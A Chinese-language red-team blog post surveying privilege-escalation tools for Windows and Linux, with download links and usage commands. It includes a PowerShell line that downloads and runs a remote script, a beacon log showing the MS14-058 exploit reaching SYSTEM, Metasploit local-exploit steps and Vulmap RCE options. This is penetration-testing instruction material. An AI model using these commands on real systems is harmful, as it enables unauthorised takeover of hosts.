[ 红队知识库 ] Windows Linux 下常用的提权扫描辅助工具(含工具下载链接及使用介绍)
创始人
2025-05-29 02:43:02
0

🍬 博主介绍

👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~
✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

文章目录

  • 🍬 博主介绍
  • 一、使用Windows-Exploit-Suggester解析systeminfo
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
      • 1.安装xlrd包(注意python2、3版本的pip问题)
      • 2.获取对应的漏洞信息库(注意要使用python2来获取)
      • 3.生成要进行对比的靶机的系统信息
      • 4.使用windows-exploit-suggester.py来进行对比
  • 二、使用Linux-Exploit-Suggester.sh寻找linux提权问题
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
  • 三、使用Sherlock工具
    • 1、简介
    • 2、下载地址:
    • 3、使用方式:
      • 1.加载脚本
      • 2.发现漏洞
      • 3.验证漏洞
    • 4、使用实例:
  • 四、使用MSF查询补丁和可利用提权漏洞
    • 1、查询补丁
    • 2、查询Exp
    • 3、利用示例
  • 五、使用powerup检查提权漏洞
    • 1、简介
    • 2、下载地址
    • 3、使用方式
    • 4、注意
  • 六、accesschk.exe
    • 1、简介
    • 2、下载地址
    • 3、使用方式
      • 1.AccessChk常用参数:
      • 2.常用语句
      • 3.详细使用方式
  • 七、WindowsVulnScan
    • 1、简介
    • 2、下载地址:
    • 3、使用方式
      • 1.参数介绍
      • 2.使用方式
  • 八、gtfo
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 九、Vulmap
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 十、BeRoot
    • 1、简介
    • 2、下载地址
    • 3、使用方式
  • 十一、在线提权漏洞检测平台

一、使用Windows-Exploit-Suggester解析systeminfo

1、简介

Windows-Exploit-Suggester是受Linux_Exploit_Suggester的启发而开发的一款提权辅助工具,用python开发而成,通过比对systeminfo生成的文件,从而发现系统是否存在未修复漏洞。

2、下载地址:

https://github.com/AonCyberLabs/Windows-Exploit-Suggester

3、使用方式:

1.安装xlrd包(注意python2、3版本的pip问题)

使用python2 的pip来安装xlrd包
命令:

python2 -m pip install xlrd==1.2.0

在这里插入图片描述

安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。所以pandas.read_excel(‘xxx.xlsx’)会报错。

在这里插入图片描述

2.获取对应的漏洞信息库(注意要使用python2来获取)

python2 windows-exploit-suggester.py --update

在这里插入图片描述

成功后会生成一个xls表格文件

在这里插入图片描述

3.生成要进行对比的靶机的系统信息

systeminfo > systeminfo_win10.txt 

在对应的靶机上运行该命令把靶机安装不到情况写入systeminfo_win10.txt文件中

在这里插入图片描述

4.使用windows-exploit-suggester.py来进行对比

python2 windows-exploit-suggester.py --database 2023-03-07-mssb.xls --systeminfo systeminfo_win10.txt

在这里插入图片描述

二、使用Linux-Exploit-Suggester.sh寻找linux提权问题

1、简介

Linux_Exploit_Suggester是一款根据操作系统版本号自动查找相应提权脚本的工具

2、下载地址:

https://github.com/mzet-/linux-exploit-suggester

3、使用方式:

./linux-exploit-suggester.sh

在这里插入图片描述

三、使用Sherlock工具

1、简介

Sherlock是一个在Windows下用于本地提权的PowerShell脚本。
目前包含了以下漏洞:

MS10-015 : User Mode to Ring (KiTrap0D)
MS10-092 : Task Scheduler
MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
MS13-081 : TrackPopupMenuEx Win32k NULL Page
MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
MS15-051 : ClientCopyImage Win32k
MS15-078 : Font Driver Buffer Overflow
MS16-016 : ‘mrxdav.sys’ WebDAV
MS16-032 : Secondary Logon Handle

2、下载地址:

https://github.com/rasta-mouse/Sherlock

3、使用方式:

1.加载脚本

本地加载脚本

Import-Module Sherlock.ps1 

远程加载脚本

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')

2.发现漏洞

Find-AllVulns

在这里插入图片描述

Appears Vulnerable就是存在漏洞

3.验证漏洞

elevate ms14-058 smb

在这里插入图片描述
在这里插入图片描述

4、使用实例:

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rastabeacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytesbeacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerablebeacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)

四、使用MSF查询补丁和可利用提权漏洞

1、查询补丁

meterpreter> run post/windows/gather/enum_patches 
[+] KB2999226 installed on 11/25/2020 
[+] KB976902 installed on 11/21/2010 

2、查询Exp

msf> use post/multi/recon/local_exploit_suggester 
msf> set LHOST <攻击机IP> msf> set SESSION  msf> run 

3、利用示例

msf> use exploit/windows/local/cve_2019_1458_wizardopium 
msf> set SESSION 
msf> run 
meterpreter> getuid 
Server username: NT AUTHORITY\SYSTEM

五、使用powerup检查提权漏洞

1、简介

PowerUp 所做的事是寻找可能存在弱点的地方,从而帮助提权。
利用 PowerUp 进行提权需要首先导入 ps1 文件powershell-import PowerUp.ps1,再执行powershell Invoke-AllChecks命令,使用 PowerUp 脚本可以快速的帮助我们发现系统弱点,从而实现提权的目的。

2、下载地址

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

3、使用方式

执行以下命令:将 ps1 文件上传到目标主机,并执行所有弱点检查。

powershell-import PowerUp.ps1 
powershell invoke-allchecks

在这里插入图片描述

4、注意

1、如果在自己的靶机上发现导入ps1文件失败,这可能是因为系统不允许执行不信任的脚本文件导致的。
这时为了复现成功可以来到靶机下,以管理员权限打开 Powershell,运行set-ExecutionPolicy RemoteSigned,输入Y回车,此时系统便能导入PowerUp.ps1文件了。
如果是真实环境执行不了那就只能换工具了。
2、在运行Invoke-AllChecks后,便会列出当前系统中可被提权的弱点之处,之后再执行检查结果中AbuseFunction下的命令便能开始提权操作了。

六、accesschk.exe

1、简介

AccessChk是微软提供的一款安全检查工具,是Sysintenals集合中的一款工具,使用它可以对Windows系统中的一些系统文件、服务、注册表等进行管理和维护排查等功能,可以很直观清晰的发现系统资源存在的缺陷,对其进行提权等,所以往往会被攻击者利用。

2、下载地址

英文版本:

http://technet.microsoft.com/en-us/sysinternals/bb664922

中文版本:

http://technet.microsoft.com/ZH-cn/sysinternals/bb664922

3、使用方式

1.AccessChk常用参数:

-c Name是服务名称,如spooler
-d 仅处理目录,或最高级的
-k Name是注册表项
-n 仅显示没有访问权限的对象
-p Name是进程或进程PID,例如svchost.exe
-r 仅显示具有读取访问权限的对象
-s 递归
-v 显示详细信息
-w 仅显示具有写入访问权限的对象

2.常用语句

查看所有用户在d盘dir路径的子路径的权限 
accesschk "d:\dir" 
查看Administrator用户在d盘dir路径的子路径的权限 
accesschk "Administrator "d:\dir" 
查看Administrators组对所有服务的权限 
accesschk Administrators -c * 
查看Guest用户对hklm\software注册表的权限 
accesschk -k Guest hklm\software 
查看User用户对全局对象的权限
accesschk -ou User 

3.详细使用方式

https://learn.microsoft.com/zh-cn/sysinternals/downloads/accesschk

七、WindowsVulnScan

查找主机上具有的CVE,查找具有公开EXP的CVE的Python脚本

1、简介

WindowsVulnScan是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免database is locked的错误,采用md5哈希算法确保数据不重复插入。
本工具查找是否有公开exp的网站为shodan,该网站限制网络发包的速度,因而采用了单线程的方式,且耗时较长。

2、下载地址:

https://github.com/chroblert/WindowsVulnScan

3、使用方式

1.参数介绍

可选参数:-h, --help            show this help message and exit-u, --update-cve      更新CVEKB数据-U, --update-exp      更新CVEEXP数据-m MODE, --mode MODE  搭配-U使用。更新模式 All:更新所有;Empty:只更新空白的;Error:只更新之前未成功更新的-C, --check-EXP       检索具有EXP的CVE-n PRODUCTNAME, --productName PRODUCTNAME搭配-C使用。自定义产品名称,如Windows 10-N PRODUCTVERSION, --productVersion PRODUCTVERSION搭配-C使用。自定义产品版本,如20H2-f FILE, --file FILE  ps1脚本运行后产生的.json文件

2.使用方式

1. 首先运行powershell脚本KBCollect.ps收集一些信息
.\KBCollect.ps1 
2. 将运行后产生的KB.json文件移动到cve-check.py所在的目录
3. 安装一些python3模块
python3 -m pip install requirements.txt 
4. 运行cve-check.py -u创建CVEKB数据库
5. 运行cve-check.py -U更新CVEKB数据库中的hasPOC字段
cve-check.py -u 此处可以使用-m选择更新模式。-m All:更新所有-m Empty:只更新hasPOC字段为空的-m Error:只更新hasPOC字段为Error的
6. 运行cve-check.py -C -f KB.json查看具有公开EXP的CVE,如下:
cve-check.py -C -f KB.json
7. 若使用脚本扫描到的系统名称和版本不准确,可以使用-n,-N进行指定

八、gtfo

1、简介

特征。该工具的唯一功能是让您能够从终端中搜索gtfobins和lolbas。
GTFOBins:Linux命令提权辅助查询

https://gtfobins.github.io/

LOLBAS:Windows命令提权辅助查询

https://lolbas-project.github.io/

2、下载地址

https://github.com/mzfr/gtfo

3、使用方式

https://github.com/mzfr/gtfo

九、Vulmap

1、简介

Vulmap是一款漏洞扫描工具, 可对Web容器、Web服务器、Web中间件以及CMS等Web程序进行漏洞扫描, 并且具备漏洞利用功能。 相关测试人员可以使用vulmap检测目标是否存在特定漏洞, 并且可以使用漏洞利用功能验证漏洞是否真实存在。

2、下载地址

https://github.com/vulmon/Vulmap

安装依赖:

pip3 install -r requirements.txt

3、使用方式

测试所有漏洞poc
python3 vulmap.py -u http://testphp.vulnweb.com
RCE漏洞使用id命令
python3 vulmap.py -u http://example.com -c "id"
指定web容器 -a参数
python3 vulmap.py -u http://example.com -a struts2
指定模式 -m参数
python3 vulmap.py -u http://example.com -m poc -a struts2
指定漏洞 -v参数
python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729
批量扫描URL -f参数
python3 vulmap.py -f scan_list.txt
导出扫描结果 -o参数
python3 vulmap.py -u http://example.com -o result.txt
详细使用可参考:
https://blog.csdn.net/qq_45924653/article/details/109022892

十、BeRoot

1、简介

BeRoot是一个后期开发工具,用于检查常见的Windows的配置错误,以方便找到提高我们提权的方法。其二进制编译地址为:

https://github.com/AlessandroZ/BeRoot/releases

它将作为后开发模块被添加到pupy(Pupy是一个开源,跨平台(Windows,Linux,OSX,Android),多功能RAT远程管理工具和后开发工具,主要用python编写)项目中(因此它将在内存中执行,而不会在硬盘中执行)。
需要注意的是,这款工具只能用来检测,而无法直接利用目标系统中存在的漏洞。但是,如果它发现了错误配置,它可以通过模版来利用这些漏洞。模版文件位于templates/service目录下,如果项目提供的模版文件无法运行,我们也可以根据目标系统的情况手动创建一个模版文件。

2、下载地址

https://github.com/AlessandroZ/BeRoot

3、使用方式

https://www.cnblogs.com/backlion/p/7325144.html

在这里插入图片描述

十一、在线提权漏洞检测平台

极光无限出品的安全扫描仪,在提权方面,基于其强大的安全检测能力,能够给出专业的修复建议,有效验证和加固网络资产漏洞。
查询地址:

https://detect.secwx.com/

在这里插入图片描述

相关内容

热门资讯

【Vue3 基础篇】04.响应... 计算属性 computed Vue 提供的一种,用来描述复杂逻辑的响应式状态的 API:计算属性 A...
vue $get和$set方法 vue $get 和 $set 方法 $set方法 $set 方法用于添加响应式对象的属性ÿ...
《微机原理与接口技术》期末考试... 内容还会更新 微机原理只有理解了为什么,才可以真正记住这些代码怎么写,知...
【高阶数据结构】布隆过滤器和分... 文章目录1. 前置知识① 散列表② Hash函数③ 为什么要选择Hash④ 负载因子⑤ 解决哈希冲突...
css 背景渐变 序:本来用圆锥渐变画一个色盘的,后来想想要不要把背景渐变也总结一下&#x...
React 执行架构流程详细-... React 执行架构流程详细----归阶段 mount 时流程(三) 目...
mac删除文件夹它又自动恢复 ... 我们在使用电脑的过程中,需要不断地去清理电脑中不用或废弃的文件,从而保证...
Go Wails Docker... 文章目录1.背景2. 技术选型2.1 Wails2.2 Go2.3 Ant Design Vue3....
关于Anaconda安装后Sp... tensorflow1.14.0安装教程--保姆级_安装tensorflow1.14_星河欲转。的博...
(18)C#传智:HTML,属... 比较简单,无事的跳过,直接w3c.school 一、HTML简介  ...
ORBSLAM3 --- 地图... 目录 1.函数作用 2.函数流程 3.代码注释 4.代码解析 4.1 中止全局BA线程、局部建图线...
【MapGIS精品教程】012... 文章目录 一、DEM概述二、DEM建立1. 创建规则格网Grid2. 创建不规则三角网Tin 三、数...
Spring OpenFeig... 在前文,我们了解到feign实现负载均衡需要两个重要的接口: ILoad...
汽车电子的搬运工(AUTOSA... AUTOSAR开发技术手册 一、总体概述 AUTOSAR是Automotive Open Syste...
Selfish (Space ... Getting Started: Selfish (Space Edition) version 1...
idea中使用maven进行多... 引言 模块关系: A:代表父工程B:代表WEB模块&#x...
一篇博客教会你怎么使用Dock... 文章目录启动 Docker创建 Nginx 容器配置 Nginx 首先我们需要安装Docker&#...
STM32F407/ hk32... STM32F407/ hk32f030m 系统性能测试–dhrystone 一.MCU 基本情况 C...
BC95 低功耗的NB-IoT... BC95 是一款高性能、低功耗的NB-IoT 无线通信模块。其尺寸仅为19.9 × 23.6 × 2...
【入门4 数组】P5729 【... 【深基5.例7】工艺品制作 题目描述 现有一个长宽高分别为 w,x,hw,x,hw,x,h 组成的实...